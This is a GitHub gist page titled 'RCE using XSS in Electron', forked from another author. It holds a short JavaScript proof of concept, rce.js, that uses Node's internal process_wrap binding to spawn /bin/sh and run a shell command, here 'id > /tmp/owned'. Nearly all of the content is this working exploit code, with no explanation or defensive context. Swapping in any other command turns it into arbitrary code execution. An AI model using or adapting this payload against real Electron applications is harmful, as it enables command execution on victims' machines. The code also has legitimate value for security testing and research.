Skip to content

Instantly share code, notes, and snippets.

@franquis

franquis/rce.js

Forked from thejh/rce.js
Created March 16, 2018 14:01
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save franquis/64cabb7ae573ae56ba6c33bc5c1cd21c to your computer and use it in GitHub Desktop.
Save franquis/64cabb7ae573ae56ba6c33bc5c1cd21c to your computer and use it in GitHub Desktop.
Download ZIP
RCE using XSS in Electron
Raw
rce.js
var Process = process.binding('process_wrap').Process;
var proc = new Process();
proc.onexit = function(a,b) {};
var env = process.env;
var env_ = [];
for (var key in env) env_.push(key+'='+env[key]);
proc.spawn({file:'/bin/sh',args:['sh','-c','id > /tmp/owned'],cwd:null,windowsVerbatimArguments:false,detached:false,envPairs:env_,stdio:[{type:'ignore'},{type:'ignore'},{type:'ignore'}]});
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment